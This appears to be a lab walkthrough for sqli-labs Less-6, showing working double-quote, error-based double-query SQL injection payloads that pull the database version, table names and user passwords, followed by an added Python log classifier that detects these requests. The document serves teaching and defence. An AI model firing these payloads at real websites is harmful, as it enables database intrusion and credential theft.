Less-6 GET - Double Injection - Double quotes - String
1. Original page
2.?id=1
3.?id=1
'"1\"" LIMIT 0,1' --> ' "1\"" LIMIT 0,1 ' --> "1\"" LIMIT 0,1 -->
SQL:
Select login_name,password from admin where id="input" limit 0,1;
4. Obtain database information
?id=0" union select 1,count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a -- +
(For the underlying principle, see: https://blog.csdn.net/qq_42630215/article/details/104700359)
5. Obtain the table names
?id=0" union select 1,count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a -- +
To view the other tables, change the limit offset.
6. Obtain user information
?id=0" union select 1,count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2)) as a from information_schema.tables group by a -- +
To obtain another user's information, change the limit offset.
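From the defender's side, the steps above leave a recognisable trace in the web server's access log. The following is an added example (not part of the original walkthrough or of sqli-labs) that classifies request paths as the step-3 closing-quote probe or the double-query injection, and lists which expressions an injected inner concat() was built to leak; the request paths are constructed samples built from the payloads above.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests (not from the original page); the injected
# values are the Less-6 double-query payloads walked through above.
REQUEST_LOG = [
    "/Less-6/?id=1",
    "/Less-6/?id=1%22",
    "/Less-6/?id=0%22+union+select+1,count(*),concat((select+concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)+limit+0,1),floor(rand(0)*2))+as+a+from+information_schema.tables+group+by+a+--+%2B",
    "/Less-6/?id=0%22+union+select+1,count(*),concat((select+concat(username,0x3a,0x3a,password,0x3a,0x3a)+from+security.users+limit+1,1),floor(rand(0)*2))+as+a+from+information_schema.tables+group+by+a+--+%2B",
]

# count(*) grouped by a rand(0)-derived key is what forces the duplicate-key error,
# so all three markers together are the signature of the technique.
DOUBLE_QUERY_MARKERS = ("floor(rand(0)*2)", "count(*)", "group by")

def id_param(path: str) -> str:
    """Decoded, lower-cased, whitespace-collapsed id= value (parse_qs undoes %22 and '+')."""
    raw = parse_qs(urlsplit(path).query, keep_blank_values=True).get("id", [""])[0]
    return " ".join(raw.split()).lower()

def classify_request(path: str) -> str:
    """'normal', 'quote_probe' (step 3's 1") or 'double_query_injection' for one request."""
    value = id_param(path)
    if all(marker in value for marker in DOUBLE_QUERY_MARKERS):
        return "double_query_injection"
    if value[:-1].isdigit() and value[-1] in "\"'":
        return "quote_probe"
    return "normal"

def leaked_expressions(path: str) -> list[str]:
    """Triage helper: the expressions the inner 'select concat(...)' would exfiltrate."""
    value = id_param(path)
    start = value.find("(select concat(")
    if start < 0:
        return []
    depth, args, cur = 0, [], ""
    for ch in value[start + len("(select concat"):]:  # walk from concat's own '('
        depth += (ch == "(") - (ch == ")")
        if depth == 0:                       # matching ')' of the concat: done
            break
        if ch == "," and depth == 1:         # top-level argument separator
            args, cur = args + [cur], ""
        elif depth > 1 or ch != "(":         # skip only the opening '(' itself
            cur += ch
    args.append(cur)
    # 0x3a literals are just the ':' separators; keep the real column expressions
    return [a.strip() for a in args if a.strip() and not a.strip().startswith("0x")]
```

Whitespace is collapsed and the value lower-cased before matching, so the usual spacing and case variations of the same payload are still caught; nested calls such as version() are handled by the depth counter rather than a flat regex.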